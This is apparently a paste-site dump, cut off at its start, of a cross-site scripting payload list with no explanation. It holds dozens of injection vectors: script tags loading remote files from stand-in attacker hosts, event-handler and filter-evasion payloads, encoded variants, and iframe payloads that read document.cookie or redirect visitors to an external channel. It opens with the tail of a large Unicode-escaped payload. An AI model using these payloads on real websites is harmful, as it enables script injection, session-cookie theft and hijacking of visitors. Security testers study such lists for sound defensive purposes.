62\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
  381. </body>
  382. </html>
  383. <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
  384. <SCRIPT> alert(“XSS”); </SCRIPT>
  385. <BODY ONLOAD=alert("XSS")>
  386. <BODY BACKGROUND="javascript:alert('XSS')">
  387. <IMG SRC="javascript:alert('XSS');">
  388. <IMG DYNSRC="javascript:alert('XSS')">
  389. <IMG LOWSRC="javascript:alert('XSS')">
  390. <IFRAME SRC=”http://hacker-site.com/xss.html”>
  391. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  392. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  393. <TABLE BACKGROUND="javascript:alert('XSS')">
  394. <TD BACKGROUND="javascript:alert('XSS')">
  395. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  396. <DIV STYLE="width: expression(alert('XSS'));">
  397. <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
  398. <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
  399. &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  400. &apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
  401. &lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
  402. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
  403. &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  404. &lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
  405. &lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  406. &lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  407. &lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
  408. &lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
  409. &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
  410. &lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
  411.  
  412.  
  413.  
  414. %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
  415. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  416. <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
  417. <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
  418. <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
  419. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  420. <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
  421. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  422. <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
  423. <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
  424. <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
  425. <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
  426. <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
  427. <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
  428. <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
  429. <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
  430. <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
  431. <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
  432. <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
  433. <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
  434. <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
  435. <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
  436. <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
  437. <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
  438. <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
  439. <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
  440. <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
  441. <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
  442. <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
  443. <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
  444. <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
  445. <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
  446. <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
  447. <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
  448. <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
  449. <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
  450. <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
  451. <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
  452. <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
  453. <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
  454. <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
  455. <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
  456. <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
  457. <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
  458. <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
  459. <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
  460. <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
  461. <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
  462. <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
  463. <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
  464. <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
  465. <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
  466. <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
  467. <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
  468. <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
  469. <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
  470. <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  471. <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
  472. <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
  473. <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
  474. <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
  475. <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
  476. <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
  477. <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
  478. <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
  479. <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
  480. <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
  481. <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
  482. <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
  483. <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
  484. <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
  485. <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
  486. <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
  487. <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
  488. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
  489. <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
  490. <INPUT TYPE="BUTTON" action="alert('XSS')"/>
  491. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  492. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  493. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  494. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  495. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  496. "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
  497. "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  498. "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
  499. ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
  500. g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
  501. <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
  502. "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
  503. "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
  504. <iframe src=http://xss.rocks/scriptlet.html <
  505. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  506. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  507. <iframe src="&Tab;javascript:prompt(1)&Tab;">
  508. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  509. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  510. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  511. <img/src=`` onerror=this.onerror=confirm(1)
  512. <form><isindex formaction="javascript&colon;confirm(1)"
  513. <img src=``&NewLine; onerror=alert(1)&NewLine;
Add Comment
Please, Sign In to add comment